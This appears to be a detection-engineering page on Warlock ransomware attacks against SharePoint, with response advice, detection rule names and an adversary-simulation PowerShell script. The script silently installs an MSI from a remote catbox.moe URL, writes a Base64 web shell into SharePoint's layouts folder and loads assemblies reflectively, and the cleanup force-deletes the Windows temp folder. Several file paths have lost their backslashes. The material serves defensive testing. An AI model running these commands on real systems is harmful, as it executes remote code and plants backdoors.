Warlock Ransomware Attacks Critical Water and Telecom Infrastructure
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A China-nexus threat actor tracked as Longlegs is deploying Warlock ransomware by exploiting Microsoft SharePoint vulnerabilities. The group uses a ToolShell exploit chain for initial access before moving laterally across compromised networks. The attackers also apply advanced evasion techniques, including abusing vulnerable drivers to disable security software and leveraging legitimate cloud services for payload delivery.
Investigation
The investigation traced activity from initial SharePoint exploitation to deployment of a webshell within the LAYOUTS directory. Analysts observed forged ASP.NET machine keys being used for remote code execution and ransomware staged in the SYSVOL share for domain-wide distribution. The attack chain also involved DLL sideloading and abuse of Visual Studio Code tunneling functionality for persistent access.
Mitigation
Organizations should prioritize patching Microsoft SharePoint Server to remediate known ToolShell vulnerabilities. Enforcing strict controls over signed but vulnerable drivers can help prevent BYOVD attacks. Security teams should also monitor for anomalous use of living-off-the-land tools and restrict access to the SYSVOL share for non-administrative activity to reduce lateral movement and ransomware deployment.
Response
When malicious activity is detected, incident responders should isolate affected SharePoint servers and inspect the SYSVOL share for unauthorized scripts or binaries. Perform a comprehensive audit of domain accounts, focusing on unauthorized additions to the local Administrators group. Review network traffic for outbound connections to file-sharing services such as catbox.moe or wasabisys.com used for payload staging.
Attack Flow
Detections
Add User to Local Administrators (via cmdline)
Download or Upload via Powershell (via cmdline)
Suspicious Powershell Strings (via cmdline)
Call Suspicious .NET Classes/Methods from Powershell CommandLine (via process_creation)
Possible Network Shares Discovery (via cmdline)
Suspicious Domain Trusts Discovery (via cmdline)
Possible Remote MSI File Installation Attempt (via cmdline)
Suspicious Execution from Public User Profile (via process_creation)
Suspicious Powershell Strings (via powershell)
Call Suspicious .NET Methods from Powershell (via powershell)
Possible Webshell Creation In Microsoft Exchange / Sharepoint Directories (via file_event)
Suspicious Files in Public User Profile (via file_event)
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
Suspicious Command and Control by Request to Out-of-Band Interactions Domain (via dns)
IOCs (HashSha256) to detect: Warlock Ransomware Attackers Hit Water and Telecom Operators
Detection of Malicious PowerShell Command for Code Execution [Windows Powershell]
Warlock Ransomware Staging and Execution via Network Shares [Windows File Event]
Warlock Ransomware Indicators on SharePoint Servers [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The adversary aims to deploy Warlock ransomware on a SharePoint server. The attack begins by using
msiexecto pull a malicious MSI from a remote attacker-controlled domain (catbox.moe). Following the initial foothold, the attacker uses PowerShell to write a malicious ASPX web shell into the SharePointlayout2sp.aspxpath using a Base64 encoded payload to bypass simple string filters. Finally, the attacker attempts to load a malicious .NET assembly directly into memory usingSystem.Workflow.ComponentModelto execute code without leaving a file footprint on the disk. -
Regression Test Script:
# Warlock Ransomware Simulation Script # NOTE: This script is for authorized testing purposes only. Write-Host "[!] Starting Warlock Ransomware Simulation..." -ForegroundColor Red # 1. Simulate MSIEXEC Remote Download (Selection 3) Write-Host "[*] Simulating MSIEXEC remote payload download..." Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue # 2. Simulate PowerShell ASPX Web Shell Drop (Selection 1) # We use the exact string from the rule to ensure detection Write-Host "[*] Simulating PowerShell web shell drop via Base64..." $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))""" Invoke-Expression $cmd1 # 3. Simulate Reflective Assembly Loading (Selection 2) Write-Host "[*] Simulating Reflective Assembly Load..." $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel" Invoke-Expression $cmd2 Write-Host "[+] Simulation commands dispatched." -ForegroundColor Green -
Cleanup Commands:
# Cleanup script to remove any artifacts created during simulation Write-Host "[!] Cleaning up simulation artifacts..." -ForegroundColor Yellow # Remove simulated files (Note: In a real test, you would target the specific paths created) # Since we used dummy strings, we primarily ensure no actual malicious files were dropped. Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "[+] Cleanup complete." -ForegroundColor Green